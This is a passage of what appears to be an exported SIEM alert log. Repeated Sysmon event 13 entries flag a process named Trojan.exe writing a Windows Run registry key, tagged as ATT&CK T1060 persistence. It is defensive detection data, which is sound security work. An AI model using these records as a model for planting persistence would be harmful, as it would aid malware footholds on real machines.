..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:09.230706600Z"",""eventRecordID"":""2047"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:09.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:09.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:11.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:08.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:08.216579000Z"",""eventRecordID"":""2046"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:08.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:08.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:10.583",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:07.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:07.154338700Z"",""eventRecordID"":""2045"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:07.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:07.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:09.505",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:06.136 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:06.139605900Z"",""eventRecordID"":""2044"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:06.136\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:06.136"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:07.536",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:05.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:05.137181800Z"",""eventRecordID"":""2043"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:05.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:05.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:07.521",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:04.106 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:04.139076900Z"",""eventRecordID"":""2042"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:04.106\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:04.106"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:07.225",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:03.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:03.059615500Z"",""eventRecordID"":""2041"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:03.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:03.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:05.447",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:02.027 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:02.029229000Z"",""eventRecordID"":""2040"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:02.027\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:02.027"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:04.397",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:01.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:01.013343300Z"",""eventRecordID"":""2039"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:01.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:01.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:04.041",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:59.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:59.986553400Z"",""eventRecordID"":""2038"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:59.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:59.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:28:03.921",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:58.965 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:58.968913100Z"",""eventRecordID"":""2037"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:58.965\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:58.965"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:01.342",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:57.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 